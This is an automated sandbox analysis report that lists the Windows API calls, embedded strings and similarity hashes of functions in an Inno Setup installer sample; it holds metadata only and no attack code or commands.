                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$AllocHandleLockUnlock
                                                                                    • String ID:
                                                                                    • API String ID: 2167344118-0
                                                                                    • Opcode ID: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                                    • Instruction ID: ad050c8fb554795a0ca7e59246f03ac17dd57b6c6051e6027a9978793207e39e
                                                                                    • Opcode Fuzzy Hash: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                                    • Instruction Fuzzy Hash: A0B009C5814A05B9EC0833B24C0BD3F141CD88072C3808A6FB458BA1839C7C9C402A3D
                                                                                    APIs
                                                                                    • GetSystemMenu.USER32(00000000,00000000,0000F060,00000001), ref: 0046A1F3
                                                                                    • EnableMenuItem.USER32(00000000,00000000,00000000), ref: 0046A1F9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$EnableItemSystem
                                                                                    • String ID: CurPageChanged
                                                                                    • API String ID: 3692539535-2490978513
                                                                                    • Opcode ID: ce3d69d9ba1a62642177f6d71e0f7aaa340e11e2d471205b7fc5bc675cd66b6b
                                                                                    • Instruction ID: 7720c050ea6da0ef8e1be1b899a85f81ec2d70891b76be637dda81d079de5e74
                                                                                    • Opcode Fuzzy Hash: ce3d69d9ba1a62642177f6d71e0f7aaa340e11e2d471205b7fc5bc675cd66b6b
                                                                                    • Instruction Fuzzy Hash: 04B12834604604DFCB11DB59DA85EE973F5EF49308F2540F6E804AB362EB38AE51DB4A
                                                                                    APIs
                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047A685,?,00000000,00000000,00000001,00000000,004790B1,?,00000000), ref: 00479075
                                                                                    Strings
                                                                                    • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 00478EE9
                                                                                    • Failed to parse "reg" constant, xrefs: 0047907C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close
                                                                                    • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                    • API String ID: 3535843008-1938159461
                                                                                    • Opcode ID: 6cfa3a26321e55d12a01db98da27023ce14a7644c07822183f99b0fb8cfb2842
                                                                                    • Instruction ID: fcc941d39f61a36dc7ba98d018d7fa63e98928215e6e5a71d63c1788f81e571e
                                                                                    • Opcode Fuzzy Hash: 6cfa3a26321e55d12a01db98da27023ce14a7644c07822183f99b0fb8cfb2842
                                                                                    • Instruction Fuzzy Hash: F3818174E00148AFCF10EF95D485ADEBBF9AF49314F50816AE814B7391CB38AE05CB99
                                                                                    APIs
                                                                                    • GetForegroundWindow.USER32(00000000,00481AC0,?,00000000,00481B01,?,?,00000001,?,00000000,00000000,00000000,?,0046AF84), ref: 0048196F
                                                                                    • SetActiveWindow.USER32(?,00000000,00481AC0,?,00000000,00481B01,?,?,00000001,?,00000000,00000000,00000000,?,0046AF84), ref: 00481981
                                                                                    Strings
                                                                                    • Will not restart Windows automatically., xrefs: 00481AA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ActiveForeground
                                                                                    • String ID: Will not restart Windows automatically.
                                                                                    • API String ID: 307657957-4169339592
                                                                                    • Opcode ID: 7f50b30166131407a8f128673f7788f83b908c9bbef8313c0fb59228be05c9af
                                                                                    • Instruction ID: 795901fb084f52fa528f63c2312e933fc6fdee27908fd8459f339c5c9385a105
                                                                                    • Opcode Fuzzy Hash: 7f50b30166131407a8f128673f7788f83b908c9bbef8313c0fb59228be05c9af
                                                                                    • Instruction Fuzzy Hash: AC41F030604240AFD725EBA5E945B6E7BA8E726704F1448B7F4408B372E37C5842DB9E
                                                                                    APIs
                                                                                    • GetCursorPos.USER32(?), ref: 00424975
                                                                                    • WaitMessage.USER32(00000000,00424A69,?,?,?,?), ref: 00424A49
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: CursorMessageWait
                                                                                    • String ID: +qI
                                                                                    • API String ID: 4021538199-4068327824
                                                                                    • Opcode ID: 399c937e83af8c9a67e0d61dfb0eea40f0b910730a113ae452a6132c876950b5
                                                                                    • Instruction ID: 850bb8641a739d3fa0e3e078eaa16554ae15adb015fc2a4b55b093a82efb48cd
                                                                                    • Opcode Fuzzy Hash: 399c937e83af8c9a67e0d61dfb0eea40f0b910730a113ae452a6132c876950b5
                                                                                    • Instruction Fuzzy Hash: DA31C3B17002249BCB11EF79D4817AFB7A5EFC4304F9545ABE8049B386D7789D80CA9D
                                                                                    Strings
                                                                                    • Failed to proceed to next wizard page; showing wizard., xrefs: 0046BD6B
                                                                                    • Failed to proceed to next wizard page; aborting., xrefs: 0046BD57
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                    • API String ID: 0-1974262853
                                                                                    • Opcode ID: 2243244884f8f0dbacf357e303b6debe926f1333eeaeef60402ffea89cf8a6c6
                                                                                    • Instruction ID: 41ea3916521a7a624eafe14c23fd6f628d308964d0d2c815b7cc35631b26c174
                                                                                    • Opcode Fuzzy Hash: 2243244884f8f0dbacf357e303b6debe926f1333eeaeef60402ffea89cf8a6c6
                                                                                    • Instruction Fuzzy Hash: 6D31CE306042049FD711EB69EA85B9977E4EB15304F1440BFF804DB3A2EB386E80CB8A
APIs
  • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
• RegCloseKey.ADVAPI32(?,00477A26,?,?,00000001,00000000,00000000,00477A41), ref: 00477A0F
Strings
• Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0047799A
• %s\%s_is1, xrefs: 004779B8
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: CloseOpen
• String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
• API String ID: 47109696-1598650737
• Opcode ID: 06886a66f565e0468b769e4592232cec9d6989d0309b3619cbd247b7a06007c3
• Instruction ID: 9c5288f04ac2681b3320032c051d60ba9bbc132f2e03367f89e393ba1652dadd
• Opcode Fuzzy Hash: 06886a66f565e0468b769e4592232cec9d6989d0309b3619cbd247b7a06007c3
• Instruction Fuzzy Hash: 49216174B042046FEB01DBA9CC51A9EBBE8EB89704F90847AE504E7381D6789A058B58
APIs
• SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 0044FA1D
• ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0044FA4E
Strings
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: ExecuteMessageSendShell
• String ID: open
• API String ID: 812272486-2758837156
• Opcode ID: ee44408f46f22df0a1b012607f151a7a203705d09399f4342952afd6ee530704
• Instruction ID: 219036bbd933cc3ca485a607602a83352c0bb437124d4d28150632e42eb7a986
• Opcode Fuzzy Hash: ee44408f46f22df0a1b012607f151a7a203705d09399f4342952afd6ee530704
• Instruction Fuzzy Hash: DD213071E00204AFEB00DFA9C881B9EB7F9EB84704F60857AB405F7291D778EA45CB58
APIs
• RtlEnterCriticalSection.KERNEL32(0049A420,00000000,)), ref: 004025C7
• RtlLeaveCriticalSection.KERNEL32(0049A420,0040263D), ref: 00402630
  • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049A420,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
  • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049A420,0049A420,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
  • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049A420,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
  • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049A420,00401A89,00000000,00401A82,?,?,0040222E,021E1A68,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
Strings
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$AllocInitializeLocal
• String ID: )
• API String ID: 2227675388-1084416617
• Opcode ID: 88dd2724dbd3ff1c3207952c5660733b34460a855d8f77796fd9f5c01a3a41c6
• Instruction ID: e822125da835f5420473686c3c07f3a27ad935215509521471bf00a9407fd077
• Opcode Fuzzy Hash: 88dd2724dbd3ff1c3207952c5660733b34460a855d8f77796fd9f5c01a3a41c6
• Instruction Fuzzy Hash: 2311EF317042046EEB25AF799E1A62A6AD497D575CB24487BF804F32D2D9FD8C0282AD
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00494FC5
Strings
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: Window
• String ID: /INITPROCWND=$%x $@
• API String ID: 2353593579-4169826103
• Opcode ID: 4dd764281e3e5bd3fffa96cfa0153c2ea98d45f8120ac28787629669d01cae7f
• Instruction ID: dd767cc37dfd13d2cdbde0042d97f8edd346c26068944a47342b43ccbe763047
• Opcode Fuzzy Hash: 4dd764281e3e5bd3fffa96cfa0153c2ea98d45f8120ac28787629669d01cae7f
• Instruction Fuzzy Hash: 8C11D531A042498FDF01DBA5E851BAEBBE8EB49308F20447BE504E7282D73D99058B98
APIs
  • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
  • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
• SysFreeString.OLEAUT32(?), ref: 00446D1A
Strings
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: String$AllocByteCharFreeMultiWide
• String ID: NIL Interface Exception$Unknown Method
• API String ID: 3952431833-1023667238
• Opcode ID: 7e876c1741d6a4ab732274b2805af96121c7add3bd5ed47b260724fdb6465e77
• Instruction ID: bb0b80e2a380756916404604f3e22b1e01578a82bc6816b9b9cc7d380a4acf04
• Opcode Fuzzy Hash: 7e876c1741d6a4ab732274b2805af96121c7add3bd5ed47b260724fdb6465e77
• Instruction Fuzzy Hash: D811D671B042089FEB04DFA59D41AAEBBACEB49304F52003EF500E7281DA799D04C62E
APIs
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,004948C4,?,004948B8,00000000,0049489F), ref: 0049486A
• CloseHandle.KERNEL32(00494904,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,004948C4,?,004948B8,00000000), ref: 00494881
  • Part of subcall function 00494754: GetLastError.KERNEL32(00000000,004947EC,?,?,?,?), ref: 00494778
Strings
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: CloseCreateErrorHandleLastProcess
• String ID: D
• API String ID: 3798668922-2746444292
• Opcode ID: 25970fbfba956000743cd3c8178cfbc98a37ab1c0a0b6db99df0911e7524530c
• Instruction ID: 06a552fcbca6defc8fdbe432d7558d6d49acb7d91bb7665b8ba999baae494250
• Opcode Fuzzy Hash: 25970fbfba956000743cd3c8178cfbc98a37ab1c0a0b6db99df0911e7524530c
• Instruction Fuzzy Hash: D4015EB5604688AFDF14EBE1CC42E9EBBACDF88714F51007AF504E72D1D6789E068628
APIs
• RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DCA0
• RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DCE0
Strings
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: Value$EnumQuery
• String ID: Inno Setup: No Icons
• API String ID: 1576479698-2016326496
• Opcode ID: a6034a78eb6f28d82538eb73d6f8d4d4ecfcbebd89183b5d88f6193e65cc5de6
• Instruction ID: 57ddeb90a82b523466695c0d6df077a59cb4ba665f60dcca1a1637bef7e5778e
• Opcode Fuzzy Hash: a6034a78eb6f28d82538eb73d6f8d4d4ecfcbebd89183b5d88f6193e65cc5de6
• Instruction Fuzzy Hash: 19012B31B4533069F73085167D01F7B668C8B82B64F64003BF941EA3C0D6D99C04D36E
APIs
  • Part of subcall function 0047BB30: FreeLibrary.KERNEL32(74600000,0047FFE2), ref: 0047BB46
  • Part of subcall function 0047B804: GetTickCount.KERNEL32 ref: 0047B84C
  • Part of subcall function 0045648C: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004564AB
• GetCurrentProcess.KERNEL32(00000001,?,?,?,?,00496E1F), ref: 0049651D
• TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,00496E1F), ref: 00496523
Strings
• Detected restart. Removing temporary directory., xrefs: 004964D7
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
• String ID: Detected restart. Removing temporary directory.
• API String ID: 1717587489-3199836293
• Opcode ID: 41ea43b9c99f94dd411f6220533ab33a70ff77999e7e1cd773f2c523df5ecd5d
• Instruction ID: ef6d07dd072ead5de2427941989604cf9fc91a718c8df879baec15603ccd013a
• Opcode Fuzzy Hash: 41ea43b9c99f94dd411f6220533ab33a70ff77999e7e1cd773f2c523df5ecd5d
• Instruction Fuzzy Hash: BFE0ED722086007EDA0277BABC16A1B3F5CDB8677C793083BF90882543CA2D8804D6BD
APIs
  • Part of subcall function 00406F58: DeleteFileA.KERNEL32(00000000,0049A628,00496BB5,00000000,00496C0A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F63
• ReleaseMutex.KERNEL32(00000000,00496C11,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C,?,?,00000000), ref: 00496BFB
• CloseHandle.KERNEL32(00000000,00000000,00496C11,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00496C2C), ref: 00496C04
Strings
Memory Dump Source
• Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
Similarity
• API ID: CloseDeleteFileHandleMutexRelease
• String ID: $pI$.lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup$oI$oI
• API String ID: 3841931355-3392794427
• Opcode ID: 85745e2bf96711d5edcd0282694dbca5b76b44631e5b8e912023d4d1f59fa348
• Instruction ID: 9d4ffa1f72b1828a9bd2e7b92801d6c81e017e55b738e106198dcdadd1a8305d
• Opcode Fuzzy Hash: 85745e2bf96711d5edcd0282694dbca5b76b44631e5b8e912023d4d1f59fa348
• Instruction Fuzzy Hash: B6F0A7316086549EDF05ABA5E82296E7BA8FB48314F63087BF404E65C0D53C5C10CA2C
                                                                                    APIs
                                                                                    • SetFocus.USER32(00000000,+qI,00000000,00421A84,00000000,00000000,00418608,00000000,00000001,?,?,00464ADA,00000001,00000000,00000000,0046A045), ref: 00421D5B
                                                                                    • GetFocus.USER32 ref: 00421D69
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Focus
                                                                                    • String ID: +qI
                                                                                    • API String ID: 2734777837-4068327824
                                                                                    • Opcode ID: 9e37e0b92800fb026ee4c04a9331c4adaa629c94db3b91cf1937ec1872e30d90
                                                                                    • Instruction ID: 7c51ddb3d8c31a7125e72aada4db547e67c97af2ef3b4f9e878502f62af25610
                                                                                    • Opcode Fuzzy Hash: 9e37e0b92800fb026ee4c04a9331c4adaa629c94db3b91cf1937ec1872e30d90
                                                                                    • Instruction Fuzzy Hash: EAE04831710211A7DB1036796C857EB11855B64344F55947FF546DB263DE7CDC85068C
                                                                                    APIs
                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000,0049A628), ref: 00456C11
                                                                                    • FileTimeToSystemTime.KERNEL32(00000000,$pI,00000000,0049A628), ref: 00456C28
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$FileSystem
                                                                                    • String ID: $pI
                                                                                    • API String ID: 2086374402-3761944556
                                                                                    • Opcode ID: 3f9a07e309d28d3ed69bb25488f66f46ea45110b2c662fe6765c70228e66d0e6
                                                                                    • Instruction ID: 229b1bfa25ea94c428731b1611971c6890b9b5f6c230ce37e6a86d23df0ccc86
                                                                                    • Opcode Fuzzy Hash: 3f9a07e309d28d3ed69bb25488f66f46ea45110b2c662fe6765c70228e66d0e6
                                                                                    • Instruction Fuzzy Hash: DFD05B7340830C66CF01F1E5AC82CCFB79CD504324F100677A118A25C1FE39A654565C
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.3299819395.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.3299791662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299915391.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299941137.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3299972979.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                    • Associated: 00000001.00000002.3300001779.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_AGcC2uK0El.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastSleep
                                                                                    • String ID:
                                                                                    • API String ID: 1458359878-0
